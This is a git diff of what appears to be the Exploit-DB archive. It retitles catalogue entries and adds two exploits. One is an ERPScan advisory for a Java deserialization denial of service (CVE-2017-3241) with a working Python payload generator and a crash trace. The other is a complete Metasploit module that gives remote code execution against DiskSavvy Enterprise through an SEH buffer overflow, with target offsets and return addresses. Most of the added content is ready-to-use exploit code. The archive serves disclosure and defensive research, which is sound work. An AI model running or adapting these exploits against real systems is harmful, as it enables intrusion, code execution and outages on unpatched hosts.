diff --git a/files.csv b/files.csv index e0070106c..b84ba6815 100644 --- a/files.csv +++ b/files.csv @@ -1819,7 +1819,7 @@ id,file,description,date,author,platform,type,port 16012,platforms/windows/dos/16012.html,"Google Chrome 8.0.552.237 - address Overflow Denial of Service",2011-01-18,"Vuk Ivanovic",windows,dos,0 15649,platforms/windows/dos/15649.pl,"HP Data Protector Manager A.06.11 MMD - Null Pointer Dereference Denial of Service",2010-12-01,Pepelux,windows,dos,0 15657,platforms/windows/dos/15657.txt,"FreeTrim MP3 2.2.3 - Denial of Service",2010-12-02,h1ch4m,windows,dos,0 -15669,platforms/windows/dos/15669.py,"MediaMonkey 3.2.4.1304 - (mp3) Buffer Overflow (PoC)",2010-12-04,0v3r,windows,dos,0 +15669,platforms/windows/dos/15669.py,"MediaMonkey 3.2.4.1304 - 'mp3' Buffer Overflow (PoC)",2010-12-04,0v3r,windows,dos,0 15670,platforms/windows/dos/15670.pl,"Free Audio Converter 7.1.5 - Denial of Service (PoC)",2010-12-04,h1ch4m,windows,dos,0 15671,platforms/windows/dos/15671.pl,"WaveMax Sound Editor 4.5.1 - Denial of Service (PoC)",2010-12-04,h1ch4m,windows,dos,0 15674,platforms/windows/dos/15674.rb,"TFTPUtil GUI 1.4.5 - Denial of Service (Metasploit)",2010-12-04,"Vuk Ivanovic",windows,dos,0 @@ -5342,6 +5342,7 @@ id,file,description,date,author,platform,type,port 41030,platforms/windows/dos/41030.py,"SapLPD 7.40 - Denial of Service",2016-12-28,"Peter Baris",windows,dos,0 41042,platforms/windows/dos/41042.html,"Mozilla Firefox < 50.1.0 - Use-After-Free",2017-01-13,"Marcin Ressel",windows,dos,0 41142,platforms/unix/dos/41142.c,"SunOS 5.11 ICMP - Denial of Service",2017-01-22,"Todor Donev",unix,dos,0 +41145,platforms/multiple/dos/41145.py,"Oracle OpenJDK Runtime Environment 1.8.0_112-b15 - Java Serialization Denial Of Service",2017-01-23,ERPScan,multiple,dos,0 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 @@ -15226,6 +15227,7 @@ id,file,description,date,author,platform,type,port 41041,platforms/linux/remote/41041.rb,"Cisco Firepower Management Console 6.0 - Post Authentication UserAdd",2017-01-13,Metasploit,linux,remote,0 41073,platforms/windows/remote/41073.py,"WinaXe Plus 8.7 - Buffer Overflow",2017-01-16,"Peter Baris",windows,remote,0 41079,platforms/windows/remote/41079.rb,"DiskBoss Enterprise - GET Buffer Overflow (Metasploit)",2017-01-16,Metasploit,windows,remote,80 +41146,platforms/windows/remote/41146.rb,"DiskSavvy Enterprise - GET Buffer Overflow (Metasploit)",2017-01-23,Metasploit,windows,remote,80 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0 @@ -20557,31 +20559,31 @@ id,file,description,date,author,platform,type,port 7844,platforms/php/webapps/7844.py,"Sad Raven's Click Counter 1.0 - passwd.dat Disclosure",2009-01-21,Pouya_Server,php,webapps,0 7846,platforms/php/webapps/7846.php,"Joomla! Component com_pcchess - Blind SQL Injection",2009-01-21,InjEctOr5,php,webapps,0 7847,platforms/php/webapps/7847.txt,"Joomla! Component beamospetition 1.0.12 - SQL Injection / Cross-Site Scripting",2009-01-21,vds_s,php,webapps,0 -7849,platforms/php/webapps/7849.txt,"OwnRS Blog 1.2 - (autor.php) SQL Injection",2009-01-22,nuclear,php,webapps,0 +7849,platforms/php/webapps/7849.txt,"OwnRS Blog 1.2 - 'autor.php' SQL Injection",2009-01-22,nuclear,php,webapps,0 7850,platforms/asp/webapps/7850.txt,"asp-project 1.0 - Insecure Cookie Method",2009-01-22,"Khashayar Fereidani",asp,webapps,0 7851,platforms/php/webapps/7851.php,"Pardal CMS 0.2.0 - Blind SQL Injection",2009-01-22,darkjoker,php,webapps,0 7859,platforms/php/webapps/7859.pl,"MemHT Portal 4.0.1 - Remote Code Execution",2009-01-25,StAkeR,php,webapps,0 -7860,platforms/php/webapps/7860.php,"Mambo Component 'com_sim' 0.8 - Blind SQL Injection",2009-01-25,"Mehmet Ince",php,webapps,0 +7860,platforms/php/webapps/7860.php,"Mambo Component com_sim 0.8 - Blind SQL Injection",2009-01-25,"Mehmet Ince",php,webapps,0 7861,platforms/asp/webapps/7861.txt,"Web-Calendar Lite 1.0 - Authentication Bypass",2009-01-25,ByALBAYX,asp,webapps,0 -7862,platforms/php/webapps/7862.txt,"Flax Article Manager 1.1 - 'cat_id' SQL Injection",2009-01-25,JIKO,php,webapps,0 -7863,platforms/php/webapps/7863.txt,"OpenGoo 1.1 - (script_class) Local File Inclusion",2009-01-25,fuzion,php,webapps,0 -7864,platforms/php/webapps/7864.py,"EPOLL SYSTEM 3.1 - (Password.dat) Disclosure",2009-01-25,Pouya_Server,php,webapps,0 +7862,platforms/php/webapps/7862.txt,"Flax Article Manager 1.1 - 'cat_id' Parameter SQL Injection",2009-01-25,JIKO,php,webapps,0 +7863,platforms/php/webapps/7863.txt,"OpenGoo 1.1 - Local File Inclusion",2009-01-25,fuzion,php,webapps,0 +7864,platforms/php/webapps/7864.py,"EPOLL SYSTEM 3.1 - 'Password.dat' Disclosure",2009-01-25,Pouya_Server,php,webapps,0 7866,platforms/php/webapps/7866.txt,"Simple Machines Forum (SMF) 1.1.7 - Cross-Site Request Forgery / Cross-Site Scripting / Package Upload",2009-01-26,Xianur0,php,webapps,0 -7867,platforms/php/webapps/7867.php,"ITLPoll 2.7 Stable2 - (index.php id) Blind SQL Injection",2009-01-26,fuzion,php,webapps,0 +7867,platforms/php/webapps/7867.php,"ITLPoll 2.7 Stable2 - Blind SQL Injection",2009-01-26,fuzion,php,webapps,0 7872,platforms/asp/webapps/7872.txt,"E-ShopSystem - Authentication Bypass / SQL Injection",2009-01-26,InjEctOr5,asp,webapps,0 -7873,platforms/php/webapps/7873.txt,"Script Toko Online 5.01 - (shop_display_products.php) SQL Injection",2009-01-26,k1n9k0ng,php,webapps,0 +7873,platforms/php/webapps/7873.txt,"Script Toko Online 5.01 - SQL Injection",2009-01-26,k1n9k0ng,php,webapps,0 7874,platforms/php/webapps/7874.txt,"SHOP-INET 4 - 'grid' Parameter SQL Injection",2009-01-26,FeDeReR,php,webapps,0 7876,platforms/php/webapps/7876.php,"PHP-CMS 1 - 'Username' Blind SQL Injection",2009-01-26,darkjoker,php,webapps,0 -7877,platforms/php/webapps/7877.txt,"Wazzum Dating Software - (userid) SQL Injection",2009-01-26,nuclear,php,webapps,0 +7877,platforms/php/webapps/7877.txt,"Wazzum Dating Software - 'userid' Parameter SQL Injection",2009-01-26,nuclear,php,webapps,0 7878,platforms/php/webapps/7878.txt,"Groone's GLink ORGanizer - 'index.php cat' SQL Injection",2009-01-26,nuclear,php,webapps,0 -7879,platforms/php/webapps/7879.pl,"SiteXS 0.1.1 - (type) Local File Inclusion",2009-01-26,darkjoker,php,webapps,0 +7879,platforms/php/webapps/7879.pl,"SiteXS CMS 0.1.1 - Local File Inclusion",2009-01-26,darkjoker,php,webapps,0 7880,platforms/php/webapps/7880.txt,"ClickAuction - Authentication Bypass",2009-01-26,R3d-D3V!L,php,webapps,0 -7881,platforms/php/webapps/7881.txt,"Joomla! Component com_flashmagazinedeluxe - (mag_id) SQL Injection",2009-01-26,TurkGuvenligi,php,webapps,0 -7883,platforms/php/webapps/7883.txt,"OpenX 2.6.3 - (MAX_type) Local File Inclusion",2009-01-26,"Charlie Briggs",php,webapps,0 +7881,platforms/php/webapps/7881.txt,"Joomla! Component ElearningForce Flash Magazine Deluxe - SQL Injection",2009-01-26,TurkGuvenligi,php,webapps,0 +7883,platforms/php/webapps/7883.txt,"OpenX 2.6.3 - 'MAX_type' Parameter Local File Inclusion",2009-01-26,"Charlie Briggs",php,webapps,0 7884,platforms/php/webapps/7884.txt,"Flax Article Manager 1.1 - Remote PHP Script Upload",2009-01-27,S.W.A.T.,php,webapps,0 7885,platforms/php/webapps/7885.txt,"Max.Blog 1.0.6 - 'show_post.php' SQL Injection",2009-01-27,"Salvatore Fresta",php,webapps,0 7886,platforms/php/webapps/7886.txt,"Pixie CMS 1.0 - Multiple Local File Inclusion",2009-01-27,DSecRG,php,webapps,0 -7892,platforms/php/webapps/7892.php,"Community CMS 0.4 - (/index.php id) Blind SQL Injection",2009-01-28,darkjoker,php,webapps,0 +7892,platforms/php/webapps/7892.php,"Community CMS 0.4 - 'id' Parameter Blind SQL Injection",2009-01-28,darkjoker,php,webapps,0 7893,platforms/php/webapps/7893.txt,"gamescript 4.6 - Cross-Site Scripting / SQL Injection / Local File Inclusion",2009-01-28,Encrypt3d.M!nd,php,webapps,0 7894,platforms/php/webapps/7894.txt,"Chipmunk Blog - (Authentication Bypass) Add Admin",2009-01-28,x0r,php,webapps,0 7895,platforms/php/webapps/7895.txt,"Gazelle CMS - 'template' Local File Inclusion",2009-01-28,fuzion,php,webapps,0 diff --git a/platforms/multiple/dos/41145.py b/platforms/multiple/dos/41145.py new file mode 100755 index 000000000..47cfe5162 --- /dev/null +++ b/platforms/multiple/dos/41145.py @@ -0,0 +1,311 @@ +''' +Application: Java SE + +Vendor: Oracle + +Bug: DoS + +Reported: 23.12.2016 + +Vendor response: 24.12.2016 + +Date of Public Advisory: 17.01.2017 + +Reference: Oracle CPU Jan 2017 + +Author: Roman Shalymov + + + +1. ADVISORY INFORMATION + +Title: Oracle OpenJDK - Java Serialization DoS + +Advisory ID: [ERPSCAN-17-006] + +Risk: High + +Advisory URL: +https://erpscan.com/advisories/erpscan-17-006-oracle-openjdk-java-serialization-dos-vulnerability/ + +Date published: 17.01.2017 + +Vendor contacted: Oracle + + +2. VULNERABILITY INFORMATION + + +Class: Denial of Service + +Remotely Exploitable: Yes + +Locally Exploitable: Yes + +CVE Name: CVE-2017-3241 + +CVSS Base Score: 9.0 + + +3. VULNERABILITY DESCRIPTION + + +An attacker can cause DoS of the application which uses OpenJDK Runtime +Environment 1.8 as its core runtime engine. + + +4. VULNERABLE PACKAGES + + +OpenJDK Runtime Environment build 1.8.0_112-b15 + + +5. SOLUTIONS AND WORKAROUNDS + + +Fix ObjectInputStream.skipCustomData() method, namely readObject0(false); +call in switch statement + +Adress Oracle CPU January 2017 + + 6. AUTHOR + + +Roman Shalymov (@shalymov) + + +7. TECHNICAL DESCRIPTION + + +An attacker can craft a malicious sequence of bytes that will cause JVM +StackOverflowError in the standard Java deserialization process if it uses +ObjectInputStream.readObject() method. + + +7.1. Proof of Concept + +An attacker creates a malicious sequence of bytes, for example, using this +python script pwn_ser.py: + +''' +#!/usr/bin/env python2 + +import sys + +exp = "" + +#serialization header + +exp += '\xac\xed\x00\x05' + +exp1 = '' + +exp1 += '\x72' + +exp1 += '\x00\x0c'+'java.io.File' + +exp1 += '\x41'*8 + +exp1 += '\x00' + +exp1 += '\x00\x00' + + +exp += exp1 * 10000 + +sys.stdout.write(exp) + +''' +and save it in exp2.ser file + + +$ ./pwn_ser2.py > exp2.ser + +Let's simulate deserialization process. For this purpose, we create a +simple Java program, which uses the following standard deserialization +pattern: + + +Serialize_read.java + + +import java.io.FileInputStream; + +import java.io.ObjectInputStream; + +public class Serialize_read { + +public static void main(String args[]) throws Exception { + + if(args.length < 1) { + + System.out.println("usage: "+Serialize_read.class.getSimpleName()+" +[file]"); + + System.exit(-1); + + } + + FileInputStream fin = new FileInputStream(args[0]); + + ObjectInputStream oin = new ObjectInputStream(fin); + + try { + + Object objFromDisk = oin.readObject(); + + String s = (String)objFromDisk; + + System.out.println(s); + + System.out.println("Successfully read!"); + + }catch(Exception e){} + + System.exit(0); + +} + +} + + +Let's try to read our malicious file (we can also simulate this stuff over +network communication): + +$ javac Serialize_read.java + +$ java Serialize_read exp2.ser + +It causes the following error dump: + +Exception in thread "main" java.lang.StackOverflowError + +at +java.io.ObjectInputStream$PeekInputStream.readFully(ObjectInputStream.java:2351) + +at +java.io.ObjectInputStream$BlockDataInputStream.readUnsignedShort(ObjectInputStream.java:2834) + +at +java.io.ObjectInputStream$BlockDataInputStream.readUTF(ObjectInputStream.java:2892) + +at java.io.ObjectInputStream.readUTF(ObjectInputStream.java:1075) + +at java.io.ObjectStreamClass.readNonProxy(ObjectStreamClass.java:684) + +at java.io.ObjectInputStream.readClassDescriptor(ObjectInputStream.java:833) + +at java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1609) + +at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1521) + +at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1340) + +at java.io.ObjectInputStream.skipCustomData(ObjectInputStream.java:1984) + +at java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1628) + +at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1521) + +at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1340) + +... + +at java.io.ObjectInputStream.skipCustomData(ObjectInputStream.java:1984) + +at java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1628) + +at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1521) + +at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1340) + +at java.io.ObjectInputStream.skipCustomData(ObjectInputStream.java:1984) + +at java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1628) + +at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1521) + +at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1340) + +at java.io.ObjectInputStream.skipCustomData(ObjectInputStream.java:1984) + +at java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1628) + +at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1521) + + +8. REPORT TIMELINE + +Reported: 23.12.2016 + +Vendor response: 24.12.2016 + +Date of Public Advisory: 17.01.2017 + +9. REFERENCES +http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html +https://erpscan.com/advisories/erpscan-17-006-oracle-openjdk-java-serialization-dos-vulnerability/ + + +10. ABOUT ERPScan Research + +ERPScan research team specializes in vulnerability research and analysis of +critical enterprise applications. It was acknowledged multiple times by the +largest software vendors like SAP, Oracle, Microsoft, IBM, VMware, HP for +discovering more than 400 vulnerabilities in their solutions (200 of them +just in SAP!). + +ERPScan researchers are proud of discovering new types of vulnerabilities +(TOP 10 Web Hacking Techniques 2012) and of the "The Best Server-Side Bug" +nomination at BlackHat 2013. + +ERPScan experts participated as speakers, presenters, and trainers at 60+ +prime international security conferences in 25+ countries across the +continents ( e.g. BlackHat, RSA, HITB) and conducted private trainings for +several Fortune 2000 companies. + +ERPScan researchers carry out the EAS-SEC project that is focused on +enterprise application security awareness by issuing annual SAP security +researches. + +ERPScan experts were interviewed in specialized info-sec resources and +featured in major media worldwide. Among them there are Reuters, Yahoo, SC +Magazine, The Register, CIO, PC World, DarkReading, Heise, Chinabyte, etc. + +Our team consists of highly-qualified researchers, specialized in various +fields of cybersecurity (from web application to ICS/SCADA systems), +gathering their experience to conduct the best SAP security research. + +11. ABOUT ERPScan + +ERPScan is the most respected and credible Business Application +Cybersecurity provider. Founded in 2010, the company operates globally and +enables large Oil and Gas, Financial, Retail and other organizations to +secure their mission-critical processes. Named as an aEmerging Vendora in +Security by CRN, listed among aTOP 100 SAP Solution providersa and +distinguished by 30+ other awards, ERPScan is the leading SAP SE partner in +discovering and resolving security vulnerabilities. ERPScan consultants +work with SAP SE in Walldorf to assist in improving the security of their +latest solutions. + +ERPScanas primary mission is to close the gap between technical and +business security, and provide solutions for CISO's to evaluate and secure +SAP and Oracle ERP systems and business-critical applications from both +cyberattacks and internal fraud. As a rule, our clients are large +enterprises, Fortune 2000 companies and MSPs, whose requirements are to +actively monitor and manage security of vast SAP and Oracle landscapes on a +global scale. + +We afollow the suna and have two hubs, located in Palo Alto and Amsterdam, +to provide threat intelligence services, continuous support and to operate +local offices and partner network spanning 20+ countries around the globe. + + +Adress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301 + +Phone: 650.798.5255 + +Twitter: @erpscan + +Scoop-it: Business Application Security +''' \ No newline at end of file diff --git a/platforms/windows/remote/41146.rb b/platforms/windows/remote/41146.rb new file mode 100755 index 000000000..0e965bc18 --- /dev/null +++ b/platforms/windows/remote/41146.rb @@ -0,0 +1,150 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::Seh + include Msf::Exploit::Remote::Egghunter + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'DiskSavvy Enterprise GET Buffer Overflow', + 'Description' => %q{ + This module exploits a stack-based buffer overflow vulnerability + in the web interface of DiskSavvy Enterprise v9.1.14 and v9.3.14, + caused by improper bounds checking of the request path in HTTP GET + requests sent to the built-in web server. This module has been + tested successfully on Windows XP SP3 and Windows 7 SP1. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'vportal', # Vulnerability discovery and PoC + 'Gabor Seljan' # Metasploit module + ], + 'References' => + [ + ['EDB', '40869'] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread' + }, + 'Platform' => 'win', + 'Payload' => + { + 'BadChars' => "\x00\x09\x0a\x0d\x20", + 'Space' => 500 + }, + 'Targets' => + [ + [ + 'Automatic Targeting', + { + 'auto' => true + } + ], + [ + 'DiskSavvy Enterprise v9.1.14', + { + 'Offset' => 542, + 'Ret' => 0x101142c0 # POP # POP # RET [libspp.dll] + } + ], + [ + 'DiskSavvy Enterprise v9.3.14', + { + 'Offset' => 2478, + 'Ret' => 0x101142ff # POP # POP # RET [libspp.dll] + } + ] + ], + 'Privileged' => true, + 'DisclosureDate' => 'Dec 01 2016', + 'DefaultTarget' => 0)) + end + + def check + res = send_request_cgi( + 'method' => 'GET', + 'uri' => '/' + ) + + if res && res.code == 200 + version = res.body[/Disk Savvy Enterprise v[^<]*/] + if version + vprint_status("Version detected: #{version}") + if version =~ /9\.(1|3)\.14/ + return Exploit::CheckCode::Appears + end + return Exploit::CheckCode::Detected + end + else + vprint_error('Unable to determine due to a HTTP connection timeout') + return Exploit::CheckCode::Unknown + end + + Exploit::CheckCode::Safe + end + + def exploit + mytarget = target + + if target['auto'] + mytarget = nil + + print_status('Automatically detecting the target...') + + res = send_request_cgi( + 'method' => 'GET', + 'uri' => '/' + ) + + if res && res.code == 200 + if res.body =~ /Disk Savvy Enterprise v9\.1\.14/ + mytarget = targets[1] + elsif res.body =~ /Disk Savvy Enterprise v9\.3\.14/ + mytarget = targets[2] + end + end + + if !mytarget + fail_with(Failure::NoTarget, 'No matching target') + end + + print_status("Selected target: #{mytarget.name}") + end + + eggoptions = { + checksum: true, + eggtag: rand_text_alpha(4, payload_badchars) + } + + hunter, egg = generate_egghunter( + payload.encoded, + payload_badchars, + eggoptions + ) + + sploit = make_nops(10) + sploit << egg + sploit << rand_text_alpha(mytarget['Offset'] - egg.length) + sploit << generate_seh_record(mytarget.ret) + sploit << make_nops(8) + sploit << hunter + sploit << rand_text_alpha(4500) + + print_status('Sending malicious request...') + + send_request_cgi( + 'method' => 'GET', + 'uri' => sploit + ) + end +end \ No newline at end of file